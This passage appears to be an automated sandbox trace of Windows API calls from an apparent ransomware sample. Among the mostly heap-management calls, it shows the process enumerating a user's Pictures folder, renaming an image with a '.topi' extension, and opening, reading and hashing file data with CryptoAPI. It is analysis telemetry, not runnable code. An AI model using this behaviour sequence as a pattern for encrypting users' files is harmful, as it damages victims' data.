hHeap=0x680000) returned 1 [0095.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94b0 | out: hHeap=0x680000) returned 1 [0095.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d94b0 [0095.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9498 [0095.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94b0 | out: hHeap=0x680000) returned 1 [0095.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9498 | out: hHeap=0x680000) returned 1 [0095.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.411] GetCurrentThreadId () returned 0x8c4 [0095.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6190 [0095.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.411] GetCurrentThreadId () returned 0x8c4 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9498 [0095.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94b0 [0095.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9480 [0095.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.413] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.413] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.414] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\CBFd5Z-W.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cbfd5z-w.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\CBFd5Z-W.gif.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cbfd5z-w.gif.topi")) returned 1 [0095.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.415] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.415] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.417] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95032b30, ftCreationTime.dwHighDateTime=0x1d5b705, ftLastAccessTime.dwLowDateTime=0x9361f0c0, ftLastAccessTime.dwHighDateTime=0x1d5c0e9, ftLastWriteTime.dwLowDateTime=0x9361f0c0, ftLastWriteTime.dwHighDateTime=0x1d5c0e9, nFileSizeHigh=0x0, nFileSizeLow=0x11b46, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CiJEW.jpg", cAlternateFileName="")) returned 1 [0095.417] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\CiJEW.jpg") returned=".jpg" [0095.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\CiJEW.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cijew.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.417] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=72518) returned 1 [0095.417] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.420] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x11b20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.420] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.422] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.423] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.423] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.423] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.423] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.423] GetLastError () returned 0x0 [0095.423] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.423] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.423] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.423] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.423] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.423] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.424] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.424] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11b50) returned 0x9a06a00 [0095.424] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.424] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1bf0 [0095.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9468 [0095.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1c38 [0095.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9480 [0095.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94b0 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94c8 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.425] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94b0 | out: hHeap=0x680000) returned 1 [0095.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94c8 | out: hHeap=0x680000) returned 1 [0095.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d94c8 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d94b0 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.425] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94c8 | out: hHeap=0x680000) returned 1 [0095.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94b0 | out: hHeap=0x680000) returned 1 [0095.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.426] GetCurrentThreadId () returned 0x8c4 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6220 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.426] GetCurrentThreadId () returned 0x8c4 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94b0 [0095.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94c8 [0095.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9498 [0095.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d94e0 [0095.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0095.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94b0 | out: hHeap=0x680000) returned 1 [0095.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94b0 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94b0 | out: hHeap=0x680000) returned 1 [0095.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94e0 | 